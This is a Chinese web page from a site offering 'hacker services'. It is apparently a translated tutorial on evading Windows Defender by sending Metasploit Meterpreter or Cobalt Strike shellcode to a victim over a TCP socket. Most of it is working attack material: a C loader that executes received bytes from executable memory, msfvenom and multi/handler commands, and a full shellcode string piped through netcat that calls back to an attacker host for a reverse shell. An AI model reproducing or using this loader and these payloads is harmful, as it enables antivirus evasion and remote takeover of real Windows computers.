当前位置:首页 > 黑客服务 > 正文内容

网络黑客信息平台网:运用套接字递送shellcode绕开Windows Defender

访客4年前 (2021-04-04)黑客服务720

在我们在安裝了Windows Defender的电子计算机上运作拆箱既用的meterpreter payload时,立刻便会被阻拦。

文中将为阅读者展现怎样根据TCP套接字递送shellcode来绕开全新的Windows Defender(编写文中时是5月7日)实行现有的meterpreter payload的。

该技术性一样适用Cobalt Strike Beacon

尽管本试验中是应用Metasploit的meterpreter payload开展演试的,可是我已经用Cobalt Strike beacon对文中详细介绍的技术性开展了检测,一样也可以成功绕开Windows Defender。

事实上,这儿用以绕开Windows Defender的技术性比较简单:

在受害电子计算机(10.0.0.7)的端口号443(或别的一切端口号)上监听TCP套接字

让受害电子计算机上的套接字等候传到shellcode

进攻设备(10.0.0.5)联接到受害套接字,并将shellcode做为二进制数据信息推送

受害者电子计算机接受shellcode,分派可实行运行内存并将shellcode挪动到分派的运行内存中

受害电子计算机实行根据互联网接受的shellcode,并运行meterpreter(或cobalt strike beacon)免费下载第二阶段的合理载荷

进攻设备出示合理载荷,并接到shell

下面,使我们撰写并编译程序一个简易的PoC C 程序流程(参照编码一部分),它将替大家进行所述全部流程。

编译程序后,我们在受害设备上实行该程序流程,并查验端口号443上的套接字是不是已开启:

attacker@victim

netstat -nat | findstr /i listen | findstr /i 443

使我们转化成一个多环节的meterpreter payload,并将其輸出为C文件格式:

attacker@kali

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c > meterpreter.c

下边,使我们建立一个msf程序处理来捕捉进攻电子计算机上的meterpreter对话:

attacker@kali

msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit"

如今,我们可以从C文档中获得shellcode,并将其做为二进制数据信息回显,随后根据netcat将其根据管路传送到受害设备(TCP套接字已经监听443端口号):

attacker@kali

echo -e "\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x9a\\x50\\x30\\x9a\\x52\\x0c\\x9a\\x52\\x14\\x9a\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x9a\\x52\\x10\\x9a\\x4a\\x3c\\x9a\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x9a\\x59\\x20\\x01\\xd3\\x9a\\x49\\x18\\xe3\\x3a\\x49\\x9a\\x34\\x9a\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x9a\\x58\\x24\\x01\\xd3\\x66\\x9a\\x0c\\x4b\\x9a\\x58\\x1c\\x01\\xd3\\x9a\\x04\\x9a\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x9a\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\x89\\xe8\\xff\\xd0\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x0a\\x68\\x0a\\x00\\x00\\x05\\x68\\x02\\x00\\x01\\xbb\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\\xe8\\x67\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x9a\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x28\\x58\\x68\\x00\\x40\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\x0f\\x85\\x70\\xff\\xff\\xff\\xe9\\x9b\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc1\\xc3\\xbb\\xf0\\xb5\\xa2\\x56\\x6a\\x00\\x53\\xff\\xd5" | nc 10.0.0.7 443

到此,全部网站渗透测试的准备工作即使完成了。下边对所述全部实际操作开展简易详细介绍:

显示屏正中间的Cmd shell开启受害电子计算机上的TCP套接字(端口号443)

cmd shell下边的Windows Defender表明签字是全新的

右上方:msfconsole已经等候进攻设备推送第二阶段的重力梯度

右下方:网络攻击根据netcat将shellcode发给受害者

右上方:msfconsole为受害者出示第二阶段重力梯度,并创建meterpreter对话

阅读者很有可能会问:为何这类方式可以见效呢?我只有说自身也不清楚。但是,做为Windows Defender的超级粉丝,我觉得它在阻拦恶意程序层面做得還是十分优异的,相信它迅速就能鉴别这类绕开技术性。

#include "pch.h"

#include

#include

#include

#include

#pragma comment(lib, "ws2_32.lib")

int main()

{

LPWSADATA wsaData=new WSAData();

ADDRINFOA *socketHint=new ADDRINFOA();

ADDRINFOA *addressInfo=new ADDRINFOA();

SOCKET listenSocket=INVALID_SOCKET;

SOCKET clientSocket=INVALID_SOCKET;

CHAR bufferReceivedBytes[4096]={0};

INT receivedBytes=0;

PCSTR port="443";

socketHint->ai_family=AF_INET;

socketHint->ai_socktype=SOCK_STREAM;

socketHint->ai_protocol=IPPROTO_TCP;

socketHint->ai_flags=AI_PASSIVE;

WSAStartup(MAKEWORD(2, 2), wsaData);

GetAddrInfoA(NULL, port, socketHint, &addressInfo);

listenSocket=socket(addressInfo->ai_family, addressInfo->ai_socktype, addressInfo->ai_protocol);

bind(listenSocket, addressInfo->ai_addr, addressInfo->ai_addrlen);

listen(listenSocket, SOMAXCONN);

std::cout << "Listening on TCP port " << port << std::endl;

clientSocket=accept(listenSocket, NULL, NULL);

std::cout << "Incoming connection..." << std::endl;

receivedBytes=recv(clientSocket, bufferReceivedBytes, sizeof(bufferReceivedBytes), NULL);

if (receivedBytes > 0){

std::cout << "Received shellcode bytes " << receivedBytes << std::endl;

}

LPVOID shellcode=VirtualAlloc(NULL, receivedBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

std::cout << "Allocated memory for shellocode at: " << shellcode << std::endl;

  memcpy(shellcode, bufferReceivedBytes, sizeof(bufferReceivedBytes));

  std::cout << "Copied shellcode to: " << shellcode << std::endl << "Sending back meterpreter session...";

  ((void(*)()) shellcode)();

  return 0;

  }

  getaddrinfo function (ws2tcpip.h) - Win32 apps

  

  原文地址:

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/107686.html

分享给朋友:

“网络黑客信息平台网:运用套接字递送shellcode绕开Windows Defender” 的相关文章

贾秀东个人资料简介(简历及图片)

贾秀东人物概况 本页面提供了贾秀东个人资料简介(简历及图片),贾秀东是谁?贾秀东个人简介资料完整设计了网页求职找工作编辑个人简历作品所需要的贾秀东网站常用模板元素,不保证贾秀东人物数据真实,任何问题请联系管理员调整。 贾秀东图片 贾秀东个人资料简介 贾秀东,中国国际问题研究所特聘研究员。1...

身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)

一、身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)方法总结 1、黑客通过手身份姓名能否窃取别人银行卡里。朋友你好,这个问题不是这样理解的的,黑客是通过你的这些信息,破易你的银行卡号支付密码来盗取你的财物的,一般你只要不乱点链接,不轻易在手机。黑客控制了手机,窃取了身份证号码手机号姓名等所有...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

果蔬清洗机有用吗(果蔬清洗机有用吗_真的可以去农残吗_)

2019-01-0913:09:0622号喜欢5收藏5条评论家用果蔬清洗机这种小众的厨房电器产品,突然在网上出现了大量的宣传,给了很多懒朋友一个花钱的借口。部分宣传图片中,清洗前后对比明显的恶心图片,农药残留检测对比视频等。使许多人开始正视这种果蔬清洗机的功能。在准备点菜的时候,其实很多人都有些怀疑...

西安电脑黑客接单_怎么能找入侵蚊香社的黑客

sudo apt install g++-4.4SplashData剖析的这500万被走漏的暗码主要是北美和西欧的用户,成人网站走漏的暗码不包含在剖析陈述中。 支撑(V4增强)所谓0day缝隙的在野运用,一般是进犯活动被捕获时,发现其运用了某些0day缝隙(进犯活动与进犯样本剖析自身也是0day缝隙...

图说兰州清真寺之兰州水上清真寺

圖說蘭州清真寺之蘭州水上清真寺讀書啊,我信赖但有朗朗書聲出破廬,遲早有一日有萬鯉躍龍門之奇象。 圖說蘭州清真寺是本人在2011年開始走訪,並在中穆網蘭州社區陸續發佈的走訪蘭州清真寺之系列。不知不覺六七年過去瞭,有的清真寺有瞭很大的變化,以是在此基礎上本人再次整理發佈,希望大傢足不出戶瞭解蘭州的...

评论列表

鹿岛葵袖
2年前 (2022-07-07)

\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\x0f\\x85\\x70\\xff\\xff\\xff\\xe9\\x9b\

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。